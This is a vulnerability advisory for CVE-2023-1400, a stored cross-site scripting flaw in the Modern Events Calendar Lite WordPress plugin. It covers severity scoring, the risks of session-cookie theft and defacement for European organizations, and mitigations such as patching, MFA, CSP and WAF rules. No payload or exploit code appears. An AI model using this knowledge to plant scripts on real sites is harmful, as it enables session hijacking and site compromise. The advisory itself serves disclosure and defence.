CVE-2023-1400 is a stored Cross-Site Scripting (XSS) vulnerability identified in the Modern Events Calendar Lite WordPress plugin versions prior to 6.5.2. The vulnerability arises because the plugin fails to properly sanitize and escape certain settings inputs. This flaw allows users with high privileges, such as administrators, to inject malicious scripts that are persistently stored and executed when other users access affected pages. Notably, this vulnerability can be exploited even when the WordPress capability 'unfiltered_html' is disabled, such as in multisite environments, which typically restricts the ability to post unfiltered HTML. The attack vector requires high privilege (admin) and user interaction (e.g., visiting a page with the malicious payload). The CVSS v3.1 base score is 4.8 (medium severity), reflecting a network attack vector with low attack complexity, requiring high privileges and user interaction, and impacting confidentiality and integrity with no impact on availability. The vulnerability scope is changed (S:C), meaning the exploit can affect resources beyond the initially vulnerable component. Although no known exploits are reported in the wild, the vulnerability poses a risk of session hijacking, privilege escalation, or defacement through malicious script execution in the context of the victim's browser. The plugin is widely used in WordPress sites for event management, making it a relevant target for attackers aiming to compromise websites with administrative access or to leverage compromised admin accounts for further attacks.

For European organizations, especially those relying on WordPress for event management and using the Modern Events Calendar Lite plugin, this vulnerability can lead to unauthorized disclosure of sensitive information (confidentiality impact) and unauthorized modification of data or site content (integrity impact). Attackers exploiting this flaw could execute malicious JavaScript in the context of other users, potentially stealing session cookies or performing actions on behalf of legitimate users. This is particularly concerning for organizations with multisite WordPress deployments, common in educational institutions, media companies, and government agencies across Europe, where the assumption of restricted HTML input is bypassed. While availability is not directly impacted, the reputational damage and potential compliance issues (e.g., GDPR violations due to data leakage) could be significant. The medium severity score suggests a moderate risk, but the requirement for high privileges limits exploitation to compromised or malicious insiders or attackers who have already gained admin access. Nonetheless, the vulnerability could be leveraged as part of a multi-stage attack chain, increasing its overall threat to European organizations.

1. Immediate update of the Modern Events Calendar Lite plugin to version 6.5.2 or later, where the vulnerability is patched, is the primary and most effective mitigation. 2. Restrict administrative access to the WordPress backend through strong authentication mechanisms such as multi-factor authentication (MFA) and IP whitelisting to reduce the risk of privilege abuse. 3. Implement Content Security Policy (CSP) headers to limit the execution of unauthorized scripts, mitigating the impact of potential XSS payloads. 4. Regularly audit and monitor user roles and permissions to ensure that only trusted users have high-level privileges capable of exploiting this vulnerability. 5. Employ Web Application Firewalls (WAFs) with rules tailored to detect and block XSS payloads targeting WordPress plugins, including Modern Events Calendar Lite. 6. In multisite environments, review and tighten capability assignments and consider additional input sanitization plugins or custom filters to enforce stricter content validation. 7. Conduct periodic security scans and penetration tests focusing on plugin vulnerabilities and XSS vectors to detect and remediate issues proactively.